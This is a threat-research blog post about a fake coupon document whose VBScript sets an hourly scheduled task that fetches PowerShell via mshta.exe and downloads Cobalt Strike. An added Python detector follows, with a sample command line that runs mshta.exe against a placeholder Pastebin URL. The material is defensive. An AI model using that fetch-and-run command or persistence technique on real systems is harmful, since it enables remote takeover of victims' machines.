Fake coupon downloads Cobalt Strike to take control of your system

November 30, 2017

With the holiday shopping season in full swing, cybercriminals are taking advantage of the fact that consumers are expected to shop for great deals over the next few weeks. During this Cyber sales week, the SonicWall Capture Labs Threat Research Team has spotted a specially crafted document file pretending to be a coupon that will save you big bucks on all items with major online retailers like Amazon, eBay and AliExpress. In this infection, multiple layers of scripts are downloaded and executed to carry out the full attack.

Infection cycle:

The file arrives as a document file.

The text in the file asks the user to click on the image to access a coupon. Doing so launches a VBScript file named "Coupon code .vbs".

This script checks whether it is being executed in a virtual environment and terminates if so. Otherwise, it spawns schtasks.exe to add a scheduled task named "GooleServices_updaters".

The scheduled task tries to visit a page on Pastebin every hour using mshta.exe, a Microsoft Windows file used to launch HTML applications. This page contains another PowerShell script.

This PowerShell script launches another instance of PowerShell, which then downloads a Cobalt Strike client.

The downloaded Cobalt Strike file has the EICAR test file string appended to it, possibly in an attempt to throw off malware detection.

Cobalt Strike is threat emulation software designed for penetration testers, and it has become popular with malware authors as well. From here, the attacker can take control of the victim's machine and penetrate the network by initiating a wide array of commands.

Because of the prevalence of these types of malware attacks, especially during the holiday season, we urge our users to always be vigilant and cautious with any unsolicited email with unexpected document attachments, particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat with the following signature:
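
A defender-side check for the scheduled-task step described above, as an added example that is not part of the original SonicWall post: it scans process-creation command lines for schtasks.exe creating a task whose action runs a script host against a remote URL. The sample command lines, the placeholder URL and the function names are constructed for illustration, and the host list goes beyond mshta.exe to cover other Windows script hosts.

```python
import re

# Constructed process-creation command lines (the kind recorded by Windows
# event 4688 or Sysmon event 1). The URL is a placeholder, not an indicator.
SAMPLE_EVENTS = [
    'schtasks.exe /create /sc hourly /mo 1 /tn "GooleServices_updaters" '
    '/tr "mshta.exe https://pastebin.example/raw/PLACEHOLDER" /f',
    'schtasks.exe /create /sc daily /tn "BackupJob" /tr "C:\\Tools\\backup.exe"',
    'schtasks.exe /query /tn "GooleServices_updaters"',
    'mshta.exe C:\\Apps\\inventory.hta',
]

# Script hosts able to fetch and run remote content directly from a task action.
SCRIPT_HOSTS = {"mshta", "powershell", "wscript", "cscript"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def image_name(token):
    """Lower-case executable name without directory or .exe suffix."""
    name = token.lower().rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name

def parse_schtasks(cmdline):
    """Return the switches of a 'schtasks /create' command line, else None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or image_name(tokens[0]) != "schtasks":
        return None
    opts, key = {}, None
    for tok in tokens[1:]:
        if tok.startswith("/"):
            key = tok[1:].lower()
            opts[key] = ""
        elif key:
            opts[key], key = tok, None
    return opts if "create" in opts else None

def find_remote_script_tasks(events):
    """Flag task creations whose action runs a script host against a URL."""
    hits = []
    for cmdline in events:
        opts = parse_schtasks(cmdline) or {}
        action = opts.get("tr", "")
        url = REMOTE_URL.search(action)
        if action and url and image_name(action.split()[0]) in SCRIPT_HOSTS:
            hits.append({"task": opts.get("tn"), "schedule": opts.get("sc"),
                         "host": image_name(action.split()[0]), "url": url.group(0)})
    return hits

if __name__ == "__main__":
    for hit in find_remote_script_tasks(SAMPLE_EVENTS):
        print(hit)
```

Matching on the task action rather than the task name keeps the check useful when the name changes between campaigns.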

  • GAV: Coupon.VBS (Trojan)